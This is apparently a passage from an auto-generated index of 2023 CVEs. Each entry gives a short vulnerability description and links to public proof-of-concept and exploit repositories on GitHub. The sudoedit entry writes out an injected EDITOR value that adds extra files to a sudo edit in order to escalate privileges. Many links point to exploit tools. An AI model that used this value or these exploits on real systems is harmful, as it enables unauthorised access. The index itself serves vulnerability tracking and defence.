In Sudo before 1.9.12p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. Affected versions are 1.8.0 through 1.9.12.p1. The problem exists because a user-specified editor may contain a "--" argument that defeats a protection mechanism, e.g., an EDITOR='vim -- /path/to/extra/file' value.
- [n3m1sys/CVE-2023-22809-sudoedit-privesc](https://github.com/n3m1sys/CVE-2023-22809-sudoedit-privesc)
- [M4fiaB0y/CVE-2023-22809](https://github.com/M4fiaB0y/CVE-2023-22809)
- [3yujw7njai/CVE-2023-22809-sudo-POC](https://github.com/3yujw7njai/CVE-2023-22809-sudo-POC)
- [hello4r1end/patch_CVE-2023-22809](https://github.com/hello4r1end/patch_CVE-2023-22809)
- [Chan9Yan9/CVE-2023-22809](https://github.com/Chan9Yan9/CVE-2023-22809)
- [pashayogi/CVE-2023-22809](https://github.com/pashayogi/CVE-2023-22809)
- [asepsaepdin/CVE-2023-22809](https://github.com/asepsaepdin/CVE-2023-22809)
- [Toothless5143/CVE-2023-22809](https://github.com/Toothless5143/CVE-2023-22809)
- [AntiVlad/CVE-2023-22809](https://github.com/AntiVlad/CVE-2023-22809)
- [laxmiyamkolu/SUDO-privilege-escalation](https://github.com/laxmiyamkolu/SUDO-privilege-escalation)
- [D0rDa4aN919/CVE-2023-22809-Exploiter](https://github.com/D0rDa4aN919/CVE-2023-22809-Exploiter)
### CVE-2023-22855 (2023-02-15)
Kardex Mlog MCC 5.7.12+0-a203c2a213-master allows remote code execution. It spawns a web interface listening on port 8088. A user-controllable path is handed to a path-concatenation method (Path.Combine from .NET) without proper sanitisation. This yields the possibility of including local files, as well as remote files on SMB shares. If one provides a file with the extension .t4, it is rendered with the .NET templating engine mono/t4, which can execute code.
- [vianic/CVE-2023-22855](https://github.com/vianic/CVE-2023-22855)
### CVE-2023-22884 (2023-01-21)
Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow, Apache Software Foundation Apache Airflow MySQL Provider.This issue affects Apache Airflow: before 2.5.1; Apache Airflow MySQL Provider: before 4.0.0.\n\n
- [jakabakos/CVE-2023-22884-Airflow-SQLi](https://github.com/jakabakos/CVE-2023-22884-Airflow-SQLi)
### CVE-2023-22894 (2023-04-19)
Strapi through 4.5.5 allows attackers (with access to the admin panel) to discover sensitive user details by exploiting the query filter. The attacker can filter users by columns that contain sensitive information and infer a value from API responses. If the attacker has super admin access, then this can be exploited to discover the password hash and password reset token of all users. If the attacker has admin panel access to an account with permission to access the username and email of API users with a lower privileged role (e.g., Editor or Author), then this can be exploited to discover sensitive information for all API users but not other admin accounts.
- [Saboor-Hakimi/CVE-2023-22894](https://github.com/Saboor-Hakimi/CVE-2023-22894)
### CVE-2023-22906 (2023-07-03)
Hero Qubo HCD01_02_V1.38_20220125 devices allow TELNET access with root privileges by default, without a password.
- [nonamecoder/CVE-2023-22906](https://github.com/nonamecoder/CVE-2023-22906)
### CVE-2023-22941 (2023-02-14)
In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, an improperly-formatted ‘INGEST_EVAL’ parameter in a Field Transformation crashes the Splunk daemon (splunkd).
- [eduardosantos1989/CVE-2023-22941](https://github.com/eduardosantos1989/CVE-2023-22941)
### CVE-2023-22960 (2023-01-23)
Lexmark products through 2023-01-10 have Improper Control of Interaction Frequency.
- [t3l3machus/CVE-2023-22960](https://github.com/t3l3machus/CVE-2023-22960)
### CVE-2023-22974 (2023-02-22)
A Path Traversal in setup.php in OpenEMR < 7.0.0 allows remote unauthenticated users to read arbitrary files by controlling a connection to an attacker-controlled MySQL server.
- [gbrsh/CVE-2023-22974](https://github.com/gbrsh/CVE-2023-22974)
### CVE-2023-23138
- [OmarAtallahh/CVE-2023-23138](https://github.com/OmarAtallahh/CVE-2023-23138)
### CVE-2023-23169 (2023-05-12)
Synapsoft pdfocus 1.17 is vulnerable to local file inclusion and server-side request forgery Directory Traversal.
- [S4nshine/CVE-2023-23169](https://github.com/S4nshine/CVE-2023-23169)
### CVE-2023-23192 (2023-03-23)
IS Decisions UserLock MFA 11.01 is vulnerable to authentication bypass using scheduled task.
- [pinarsadioglu/CVE-2023-23192](https://github.com/pinarsadioglu/CVE-2023-23192)
- [Penkyzduyi/CVE-2023-23192](https://github.com/Penkyzduyi/CVE-2023-23192)
### CVE-2023-23279 (2023-02-17)
Canteen Management System 1.0 is vulnerable to SQL Injection via /php_action/getOrderReport.php.
- [tuannq2299/CVE-2023-23279](https://github.com/tuannq2299/CVE-2023-23279)
### CVE-2023-23333 (2023-02-06)
There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.
- [Timorlover/CVE-2023-23333](https://github.com/Timorlover/CVE-2023-23333)
- [Mr-xn/CVE-2023-23333](https://github.com/Mr-xn/CVE-2023-23333)
- [emanueldosreis/nmap-CVE-2023-23333-exploit](https://github.com/emanueldosreis/nmap-CVE-2023-23333-exploit)
### CVE-2023-23388 (2023-03-14)
Windows Bluetooth Driver Elevation of Privilege Vulnerability
- [ynwarcs/CVE-2023-23388](https://github.com/ynwarcs/CVE-2023-23388)
### CVE-2023-23396 (2023-03-14)
Microsoft Excel Denial of Service Vulnerability
- [LucaBarile/CVE-2023-23396](https://github.com/LucaBarile/CVE-2023-23396)
### CVE-2023-23397 (2023-03-14)
Microsoft Outlook Elevation of Privilege Vulnerability
- [sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY](https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY)
- [j0eyv/CVE-2023-23397](https://github.com/j0eyv/CVE-2023-23397)
- [alicangnll/CVE-2023-23397](https://github.com/alicangnll/CVE-2023-23397)
- [grn-bogo/CVE-2023-23397](https://github.com/grn-bogo/CVE-2023-23397)
- [ka7ana/CVE-2023-23397](https://github.com/ka7ana/CVE-2023-23397)
- [api0cradle/CVE-2023-23397-POC-Powershell](https://github.com/api0cradle/CVE-2023-23397-POC-Powershell)
- [im007/CVE-2023-23397](https://github.com/im007/CVE-2023-23397)
- [cleverg0d/CVE-2023-23397-PoC-PowerShell](https://github.com/cleverg0d/CVE-2023-23397-PoC-PowerShell)
- [ahmedkhlief/CVE-2023-23397-POC](https://github.com/ahmedkhlief/CVE-2023-23397-POC)
- [BillSkiCO/CVE-2023-23397_EXPLOIT](https://github.com/BillSkiCO/CVE-2023-23397_EXPLOIT)
- [djackreuter/CVE-2023-23397-PoC](https://github.com/djackreuter/CVE-2023-23397-PoC)
- [moneertv/CVE-2023-23397](https://github.com/moneertv/CVE-2023-23397)
- [ahmedkhlief/CVE-2023-23397-POC-Using-Interop-Outlook](https://github.com/ahmedkhlief/CVE-2023-23397-POC-Using-Interop-Outlook)
- [Trackflaw/CVE-2023-23397](https://github.com/Trackflaw/CVE-2023-23397)
- [SecCTechs/CVE-2023-23397](https://github.com/SecCTechs/CVE-2023-23397)
- [tiepologian/CVE-2023-23397](https://github.com/tiepologian/CVE-2023-23397)
- [BronzeBee/cve-2023-23397](https://github.com/BronzeBee/cve-2023-23397)
- [shaolinsec/CVE-2023-23397](https://github.com/shaolinsec/CVE-2023-23397)
- [Cyb3rMaddy/CVE-2023-23397-Report](https://github.com/Cyb3rMaddy/CVE-2023-23397-Report)
- [Zeppperoni/CVE-2023-23397-Patch](https://github.com/Zeppperoni/CVE-2023-23397-Patch)
- [jacquesquail/CVE-2023-23397](https://github.com/jacquesquail/CVE-2023-23397)
- [3yujw7njai/CVE-2023-23397-POC](https://github.com/3yujw7njai/CVE-2023-23397-POC)
- [vlad-a-man/CVE-2023-23397](https://github.com/vlad-a-man/CVE-2023-23397)
- [Muhammad-Ali007/OutlookNTLM_CVE-2023-23397](https://github.com/Muhammad-Ali007/OutlookNTLM_CVE-2023-23397)
- [Pushkarup/CVE-2023-23397](https://github.com/Pushkarup/CVE-2023-23397)
- [ducnorth2712/CVE-2023-23397](https://github.com/ducnorth2712/CVE-2023-23397)
- [sarsaeroth/CVE-2023-23397-POC](https://github.com/sarsaeroth/CVE-2023-23397-POC)
- [TheUnknownSoul/CVE-2023-23397-PoW](https://github.com/TheUnknownSoul/CVE-2023-23397-PoW)
- [Symbolexe/CVE-2023-23397](https://github.com/Symbolexe/CVE-2023-23397)
### CVE-2023-23488 (2023-01-20)
The Paid Memberships Pro WordPress Plugin, version < 2.9.8, is affected by an unauthenticated SQL injection vulnerability in the 'code' parameter of the '/pmpro/v1/order' REST route.
- [long-rookie/CVE-2023-23488-PoC](https://github.com/long-rookie/CVE-2023-23488-PoC)
- [cybfar/CVE-2023-23488-pmpro-2.8](https://github.com/cybfar/CVE-2023-23488-pmpro-2.8)
### CVE-2023-23531 (2023-02-27)
The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.2, iOS 16.3 and iPadOS 16.3. An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges.
- [DarthOCE/MonkeyJB](https://github.com/DarthOCE/MonkeyJB)
### CVE-2023-23583 (2023-11-14)
Sequence of processor instructions leads to unexpected behavior for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege and/or information disclosure and/or denial of service via local access.
- [Mav3r1ck0x1/CVE-2023-23583-Reptar-](https://github.com/Mav3r1ck0x1/CVE-2023-23583-Reptar-)
### CVE-2023-23607 (2023-01-20)
erohtar/Dasherr is a dashboard for self-hosted services. In affected versions unrestricted file upload allows any unauthenticated user to execute arbitrary code on the server. The file /www/include/filesave.php allows for any file to uploaded to anywhere. If an attacker uploads a php file they can execute code on the server. This issue has been addressed in version 1.05.00. Users are advised to upgrade. There are no known workarounds for this issue.\n
- [Pylonet/CVE-2023-23607](https://github.com/Pylonet/CVE-2023-23607)
### CVE-2023-23638 (2023-03-08)
A deserialization vulnerability existed when dubbo generic invoke, which could lead to malicious code execution. \n\nThis issue affects Apache Dubbo 2.7.x version 2.7.21 and prior versions; Apache Dubbo 3.0.x version 3.0.13 and prior versions; Apache Dubbo 3.1.x version 3.1.5 and prior versions.
- [X1r0z/Dubbo-RCE](https://github.com/X1r0z/Dubbo-RCE)
- [YYHYlh/Apache-Dubbo-CVE-2023-23638-exp](https://github.com/YYHYlh/Apache-Dubbo-CVE-2023-23638-exp)
- [3yujw7njai/CVE-2023-23638-Tools](https://github.com/3yujw7njai/CVE-2023-23638-Tools)
### CVE-2023-23752 (2023-02-16)
An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.
- [yusinomy/CVE-2023-23752](https://github.com/yusinomy/CVE-2023-23752)
- [Saboor-Hakimi/CVE-2023-23752](https://github.com/Saboor-Hakimi/CVE-2023-23752)
- [Vulnmachines/joomla_CVE-2023-23752](https://github.com/Vulnmachines/joomla_CVE-2023-23752)
- [sw0rd1ight/CVE-2023-23752](https://github.com/sw0rd1ight/CVE-2023-23752)
- [wangking1/CVE-2023-23752-poc](https://github.com/wangking1/CVE-2023-23752-poc)
- [ibaiw/joomla_CVE-2023-23752](https://github.com/ibaiw/joomla_CVE-2023-23752)
- [ifacker/CVE-2023-23752-Joomla](https://github.com/ifacker/CVE-2023-23752-Joomla)
- [z3n70/CVE-2023-23752](https://github.com/z3n70/CVE-2023-23752)
- [keyuan15/CVE-2023-23752](https://github.com/keyuan15/CVE-2023-23752)
- [adriyansyah-mf/CVE-2023-23752](https://github.com/adriyansyah-mf/CVE-2023-23752)
- [GhostToKnow/CVE-2023-23752](https://github.com/GhostToKnow/CVE-2023-23752)
- [gibran-abdillah/CVE-2023-23752](https://github.com/gibran-abdillah/CVE-2023-23752)
- [Jenderal92/Joomla-CVE-2023-23752](https://github.com/Jenderal92/Joomla-CVE-2023-23752)
- [Acceis/exploit-CVE-2023-23752](https://github.com/Acceis/exploit-CVE-2023-23752)
- [karthikuj/CVE-2023-23752-Docker](https://github.com/karthikuj/CVE-2023-23752-Docker)
- [0xNahim/CVE-2023-23752](https://github.com/0xNahim/CVE-2023-23752)
- [adhikara13/CVE-2023-23752](https://github.com/adhikara13/CVE-2023-23752)
- [AkbarWiraN/Joomla-Scanner](https://github.com/AkbarWiraN/Joomla-Scanner)
- [Ge-Per/Scanner-CVE-2023-23752](https://github.com/Ge-Per/Scanner-CVE-2023-23752)
- [ThatNotEasy/CVE-2023-23752](https://github.com/ThatNotEasy/CVE-2023-23752)
- [wibuheker/Joomla-CVE-2023-23752](https://github.com/wibuheker/Joomla-CVE-2023-23752)
- [Sweelg/CVE-2023-23752](https://github.com/Sweelg/CVE-2023-23752)
- [MrP4nda1337/CVE-2023-23752](https://github.com/MrP4nda1337/CVE-2023-23752)
- [lainonz/CVE-2023-23752](https://github.com/lainonz/CVE-2023-23752)
- [yTxZx/CVE-2023-23752](https://github.com/yTxZx/CVE-2023-23752)
- [AlissonFaoli/CVE-2023-23752](https://github.com/AlissonFaoli/CVE-2023-23752)
- [Pushkarup/CVE-2023-23752](https://github.com/Pushkarup/CVE-2023-23752)
- [blacks1ph0n/CVE-2023-23752](https://github.com/blacks1ph0n/CVE-2023-23752)
- [Youns92/Joomla-v4.2.8---CVE-2023-23752](https://github.com/Youns92/Joomla-v4.2.8---CVE-2023-23752)
- [Ly0kha/Joomla-CVE-2023-23752-Exploit-Script](https://github.com/Ly0kha/Joomla-CVE-2023-23752-Exploit-Script)
- [r3dston3/CVE-2023-23752](https://github.com/r3dston3/CVE-2023-23752)
- [svaltheim/CVE-2023-23752](https://github.com/svaltheim/CVE-2023-23752)
- [Fernando-olv/Joomla-CVE-2023-23752](https://github.com/Fernando-olv/Joomla-CVE-2023-23752)
- [K3ysTr0K3R/CVE-2023-23752-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-23752-EXPLOIT)
- [hadrian3689/CVE-2023-23752_Joomla](https://github.com/hadrian3689/CVE-2023-23752_Joomla)
- [C1ph3rX13/CVE-2023-23752](https://github.com/C1ph3rX13/CVE-2023-23752)
- [JeneralMotors/CVE-2023-23752](https://github.com/JeneralMotors/CVE-2023-23752)
- [gunzf0x/CVE-2023-23752](https://github.com/gunzf0x/CVE-2023-23752)
- [TindalyTn/CVE-2023-23752](https://github.com/TindalyTn/CVE-2023-23752)
- [shellvik/CVE-2023-23752](https://github.com/shellvik/CVE-2023-23752)
- [Rival420/CVE-2023-23752](https://github.com/Rival420/CVE-2023-23752)
- [JohnDoeAnonITA/CVE-2023-23752](https://github.com/JohnDoeAnonITA/CVE-2023-23752)
- [0xWhoami35/CVE-2023-23752](https://github.com/0xWhoami35/CVE-2023-23752)
- [mariovata/CVE-2023-23752-Python](https://github.com/mariovata/CVE-2023-23752-Python)
- [0xx01/CVE-2023-23752](https://github.com/0xx01/CVE-2023-23752)
- [h3xcr4ck3r/CVE-2023-23752](https://github.com/h3xcr4ck3r/CVE-2023-23752)
- [mil4ne/CVE-2023-23752-Joomla-v4.2.8](https://github.com/mil4ne/CVE-2023-23752-Joomla-v4.2.8)
- [Aureum01/CVE-2023-23752](https://github.com/Aureum01/CVE-2023-23752)
### CVE-2023-23924 (2023-01-31)
Dompdf is an HTML to PDF converter. The URI validation on dompdf 2.0.1 can be bypassed on SVG parsing by passing `<image>` tags with uppercase letters. This may lead to arbitrary object unserialize on PHP < 8, through the `phar` URL wrapper. An attacker can exploit the vulnerability to call arbitrary URL with arbitrary protocols, if they can provide a SVG file to dompdf. In PHP versions before 8.0.0, it leads to arbitrary unserialize, that will lead to the very least to an arbitrary file deletion and even remote code execution, depending on classes that are available.\n
- [motikan2010/CVE-2023-23924](https://github.com/motikan2010/CVE-2023-23924)
### CVE-2023-23946 (2023-02-14)
Git, a revision control system, is vulnerable to path traversal prior to versions 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7, 2.32.6, 2.31.7, and 2.30.8. By feeding a crafted input to `git apply`, a path outside the working tree can be overwritten as the user who is running `git apply`. A fix has been prepared and will appear in v2.39.2, v2.38.4, v2.37.6, v2.36.5, v2.35.7, v2.34.7, v2.33.7, v2.32.6, v2.31.7, and v2.30.8. As a workaround, use `git apply --stat` to inspect a patch before applying; avoid applying one that creates a symbolic link and then creates a file beyond the symbolic link.
- [bruno-1337/CVE-2023-23946-POC](https://github.com/bruno-1337/CVE-2023-23946-POC)
### CVE-2023-24044 (2023-01-22)
A Host Header Injection issue on the Login page of Plesk Obsidian through 18.0.49 allows attackers to redirect users to malicious websites via a Host request header. NOTE: the vendor's position is "the ability to use arbitrary domain names to access the panel is an intended feature."
- [Cappricio-Securities/CVE-2023-24044](https://github.com/Cappricio-Securities/CVE-2023-24044)
### CVE-2023-24055 (2023-01-22)
KeePass through 2.53 (in a default installation) allows an attacker, who has write access to the XML configuration file, to obtain the cleartext passwords by adding an export trigger. NOTE: the vendor's position is that the password database is not intended to be secure against an attacker who has that level of access to the local PC.
- [deetl/CVE-2023-24055](https://github.com/deetl/CVE-2023-24055)
- [alt3kx/CVE-2023-24055_PoC](https://github.com/alt3kx/CVE-2023-24055_PoC)
- [Cyb3rtus/keepass_CVE-2023-24055_yara_rule](https://github.com/Cyb3rtus/keepass_CVE-2023-24055_yara_rule)
- [duckbillsecurity/CVE-2023-24055](https://github.com/duckbillsecurity/CVE-2023-24055)
- [julesbozouklian/PoC_CVE-2023-24055](https://github.com/julesbozouklian/PoC_CVE-2023-24055)
- [digital-dev/KeePass-TriggerLess](https://github.com/digital-dev/KeePass-TriggerLess)
- [zwlsix/KeePass-CVE-2023-24055](https://github.com/zwlsix/KeePass-CVE-2023-24055)
### CVE-2023-24059 (2023-01-22)
Grand Theft Auto V for PC allows attackers to achieve partial remote code execution or modify files on a PC, as exploited in the wild in January 2023.
- [gmh5225/CVE-2023-24059](https://github.com/gmh5225/CVE-2023-24059)
### CVE-2023-24078 (2023-02-17)
Real Time Logic FuguHub v8.1 and earlier was discovered to contain a remote code execution (RCE) vulnerability via the component /FuguHub/cmsdocs/.
- [overgrowncarrot1/CVE-2023-24078](https://github.com/overgrowncarrot1/CVE-2023-24078)
- [rio128128/CVE-2023-24078](https://github.com/rio128128/CVE-2023-24078)
- [ag-rodriguez/CVE-2023-24078](https://github.com/ag-rodriguez/CVE-2023-24078)
### CVE-2023-24100
- [badboycxcc/CVE-2023-24100](https://github.com/badboycxcc/CVE-2023-24100)
### CVE-2023-24203 (-)
Cross Site Scripting vulnerability in SourceCodester Simple Customer Relationship Management System v1.0 allows attacker to execute arbitary code via the company or query parameter(s).
- [momo1239/CVE-2023-24203-and-CVE-2023-24204](https://github.com/momo1239/CVE-2023-24203-and-CVE-2023-24204)
### CVE-2023-24249 (2023-02-27)
An arbitrary file upload vulnerability in laravel-admin v1.8.19 allows attackers to execute arbitrary code via a crafted PHP file.
- [IDUZZEL/CVE-2023-24249-Exploit](https://github.com/IDUZZEL/CVE-2023-24249-Exploit)
### CVE-2023-24317 (2023-02-23)
Judging Management System 1.0 was discovered to contain an arbitrary file upload vulnerability via the component edit_organizer.php.
- [angelopioamirante/CVE-2023-24317](https://github.com/angelopioamirante/CVE-2023-24317)
### CVE-2023-24329 (2023-02-17)
An issue in the urllib.parse component of Python before 3.11.4 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters.
- [H4R335HR/CVE-2023-24329-PoC](https://github.com/H4R335HR/CVE-2023-24329-PoC)
- [Pandante-Central/CVE-2023-24329-codeql-test](https://github.com/Pandante-Central/CVE-2023-24329-codeql-test)
- [PenTestMano/CVE-2023-24329-Exploit](https://github.com/PenTestMano/CVE-2023-24329-Exploit)
### CVE-2023-24488 (2023-07-10)
Cross site scripting vulnerability in Citrix ADC and Citrix Gateway in allows and attacker to perform cross site scripting
- [SirBugs/CVE-2023-24488-PoC](https://github.com/SirBugs/CVE-2023-24488-PoC)
- [Abo5/CVE-2023-24488](https://github.com/Abo5/CVE-2023-24488)
- [securitycipher/CVE-2023-24488](https://github.com/securitycipher/CVE-2023-24488)
- [NSTCyber/CVE-2023-24488-SIEM-Sigma-Rule](https://github.com/NSTCyber/CVE-2023-24488-SIEM-Sigma-Rule)
- [raytheon0x21/CVE-2023-24488](https://github.com/raytheon0x21/CVE-2023-24488)
### CVE-2023-24489 (2023-07-10)
\nA vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller.
- [adhikara13/CVE-2023-24489-ShareFile](https://github.com/adhikara13/CVE-2023-24489-ShareFile)
- [whalebone7/CVE-2023-24489-poc](https://github.com/whalebone7/CVE-2023-24489-poc)
### CVE-2023-24517 (2023-08-22)
Unrestricted Upload of File with Dangerous Type vulnerability in the Pandora FMS File Manager component, allows an attacker to make make use of this issue ( unrestricted file upload ) to execute arbitrary system commands. This issue affects Pandora FMS v767 version and prior versions on all platforms.
- [Argonx21/CVE-2023-24517](https://github.com/Argonx21/CVE-2023-24517)
### CVE-2023-24538 (2023-04-06)
Templates do not properly consider backticks (`) as Javascript string delimiters, and do not escape them as expected. Backticks are used, since ES6, for JS template literals. If a template contains a Go template action within a Javascript template literal, the contents of the action can be used to terminate the literal, injecting arbitrary Javascript code into the Go template. As ES6 template literals are rather complex, and themselves can do string interpolation, the decision was made to simply disallow Go template actions from being used inside of them (e.g. "var a = {{.}}"), since there is no obviously safe way to allow this behavior. This takes the same approach as github.com/google/safehtml. With fix, Template.Parse returns an Error when it encounters templates like this, with an ErrorCode of value 12. This ErrorCode is currently unexported, but will be exported in the release of Go 1.21. Users who rely on the previous behavior can re-enable it using the GODEBUG flag jstmpllitinterp=1, with the caveat that backticks will now be escaped. This should be used with caution.
- [skulkarni-mv/goIssue_dunfell](https://github.com/skulkarni-mv/goIssue_dunfell)
- [skulkarni-mv/goIssue_kirkstone](https://github.com/skulkarni-mv/goIssue_kirkstone)
### CVE-2023-24610 (2023-02-01)
NOSH 4a5cfdb allows remote authenticated users to execute PHP arbitrary code via the "practice logo" upload feature. The client-side checks can be bypassed. This may allow attackers to steal Protected Health Information because the product is for health charting.
- [abbisQQ/CVE-2023-24610](https://github.com/abbisQQ/CVE-2023-24610)
### CVE-2023-24706
- [hatjwe/CVE-2023-24706](https://github.com/hatjwe/CVE-2023-24706)
### CVE-2023-24709 (2023-03-21)
An issue found in Paradox Security Systems IPR512 allows attackers to cause a denial of service via the login.html and login.xml parameters.
- [DRAGOWN/Injection-vulnerability-in-Paradox-Security-Systems-IPR512-CVE-2023-24709-PoC](https://github.com/DRAGOWN/Injection-vulnerability-in-Paradox-Security-Systems-IPR512-CVE-2023-24709-PoC)
### CVE-2023-24749
- [mahaloz/netgear-pwnagent](https://github.com/mahaloz/netgear-pwnagent)
### CVE-2023-24775 (2023-03-07)
Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the selectFields parameter at \member\Member.php.
- [csffs/CVE-2023-24775-and-CVE-2023-24780](https://github.com/csffs/CVE-2023-24775-and-CVE-2023-24780)
### CVE-2023-24871 (2023-03-14)
Windows Bluetooth Service Remote Code Execution Vulnerability
- [ynwarcs/CVE-2023-24871](https://github.com/ynwarcs/CVE-2023-24871)
### CVE-2023-24955 (2023-05-09)
Microsoft SharePoint Server Remote Code Execution Vulnerability
- [former-farmer/CVE-2023-24955-PoC](https://github.com/former-farmer/CVE-2023-24955-PoC)
### CVE-2023-24998 (2023-02-20)
Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed resulting in the possibility of an attacker triggering a DoS with a malicious upload or series of uploads.\n\n\n\n\nNote that, like all of the file upload limits, the\n new configuration option (FileUploadBase#setFileCountMax) is not\n enabled by default and must be explicitly configured.\n\n\n
- [nice1st/CVE-2023-24998](https://github.com/nice1st/CVE-2023-24998)
### CVE-2023-25136 (2023-02-03)
OpenSSH server (sshd) 9.1 introduced a double-free vulnerability during options.kex_algorithms handling. This is fixed in OpenSSH 9.2. The double free can be leveraged, by an unauthenticated remote attacker in the default configuration, to jump to any location in the sshd address space. One third-party report states "remote code execution is theoretically possible."
- [jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free](https://github.com/jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free)
- [ticofookfook/CVE-2023-25136](https://github.com/ticofookfook/CVE-2023-25136)
- [Christbowel/CVE-2023-25136](https://github.com/Christbowel/CVE-2023-25136)
- [adhikara13/CVE-2023-25136](https://github.com/adhikara13/CVE-2023-25136)
- [nhakobyan685/CVE-2023-25136](https://github.com/nhakobyan685/CVE-2023-25136)
- [axylisdead/CVE-2023-25136_POC](https://github.com/axylisdead/CVE-2023-25136_POC)
- [H4K6/CVE-2023-25136](https://github.com/H4K6/CVE-2023-25136)
- [Business1sg00d/CVE-2023-25136](https://github.com/Business1sg00d/CVE-2023-25136)
- [malvika-thakur/CVE-2023-25136](https://github.com/malvika-thakur/CVE-2023-25136)
### CVE-2023-25157 (2023-02-21)
GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.
- [win3zz/CVE-2023-25157](https://github.com/win3zz/CVE-2023-25157)
- [0x2458bughunt/CVE-2023-25157](https://github.com/0x2458bughunt/CVE-2023-25157)
- [murataydemir/CVE-2023-25157-and-CVE-2023-25158](https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158)
- [7imbitz/CVE-2023-25157-checker](https://github.com/7imbitz/CVE-2023-25157-checker)
- [Rubikcuv5/CVE-2023-25157](https://github.com/Rubikcuv5/CVE-2023-25157)
- [dr-cable-tv/Geoserver-CVE-2023-25157](https://github.com/dr-cable-tv/Geoserver-CVE-2023-25157)
### CVE-2023-25194 (2023-02-07)
A possible security vulnerability has been identified in Apache Kafka Connect API.\nThis requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config\nand a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka Connect 2.3.0.\nWhen configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config`\nproperty for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the\n`producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties.\nThis will allow the server to connect to the attacker's LDAP server\nand deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server.\nAttacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath.\n\nSince Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box\nconfigurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector\nclient override policy that permits them.\n\nSince Apache Kafka 3.4.0, we have added a system property ("-Dorg.apache.kafka.disallowed.login.modules") to disable the problematic login modules usage\nin SASL JAAS configuration. Also by default "com.sun.security.auth.module.JndiLoginModule" is disabled in Apache Kafka Connect 3.4.0. \n\nWe advise the Kafka Connect users to validate connector configurations and only allow trusted JNDI configurations. Also examine connector dependencies for \nvulnerable versions and either upgrade their connectors, upgrading that specific dependency, or removing the connectors as options for remediation. Finally,\nin addition to leveraging the "org.apache.kafka.disallowed.login.modules" system property, Kafka Connect users can also implement their own connector\nclient config override policy, which can be used to control which Kafka client properties can be overridden directly in a connector config and which cannot.\n
- [ohnonoyesyes/CVE-2023-25194](https://github.com/ohnonoyesyes/CVE-2023-25194)
- [YongYe-Security/CVE-2023-25194](https://github.com/YongYe-Security/CVE-2023-25194)
- [vulncheck-oss/cve-2023-25194](https://github.com/vulncheck-oss/cve-2023-25194)
### CVE-2023-25202
- [Trackflaw/CVE-2023-25202](https://github.com/Trackflaw/CVE-2023-25202)
### CVE-2023-25203
- [Trackflaw/CVE-2023-25203](https://github.com/Trackflaw/CVE-2023-25203)
### CVE-2023-25234 (2023-02-27)
Tenda AC500 V2.0.1.9(1307) is vulnerable to Buffer Overflow in function fromAddressNat via parameters entrys and mitInterface.
- [FzBacon/CVE-2023-25234_Tenda_AC6_stack_overflow](https://github.com/FzBacon/CVE-2023-25234_Tenda_AC6_stack_overflow)
### CVE-2023-25260 (2023-03-28)
Stimulsoft Designer (Web) 2023.1.3 is vulnerable to Local File Inclusion.
- [trustcves/CVE-2023-25260](https://github.com/trustcves/CVE-2023-25260)
### CVE-2023-25261 (2023-03-27)
Certain Stimulsoft GmbH products are affected by: Remote Code Execution. This affects Stimulsoft Designer (Desktop) 2023.1.4 and Stimulsoft Designer (Web) 2023.1.3 and Stimulsoft Viewer (Web) 2023.1.3. Access to the local file system is not prohibited in any way. Therefore, an attacker may include source code which reads or writes local directories and files. It is also possible for the attacker to prepare a report which has a variable that holds the gathered data and render it in the report.
- [trustcves/CVE-2023-25261](https://github.com/trustcves/CVE-2023-25261)
### CVE-2023-25262 (2023-03-28)
Stimulsoft GmbH Stimulsoft Designer (Web) 2023.1.3 is vulnerable to Server Side Request Forgery (SSRF). TThe Reporting Designer (Web) offers the possibility to embed sources from external locations. If the user chooses an external location, the request to that resource is performed by the server rather than the client. Therefore, the server causes outbound traffic and potentially imports data. An attacker may also leverage this behaviour to exfiltrate data of machines on the internal network of the server hosting the Stimulsoft Reporting Designer (Web).
- [trustcves/CVE-2023-25262](https://github.com/trustcves/CVE-2023-25262)
### CVE-2023-25263 (2023-03-27)
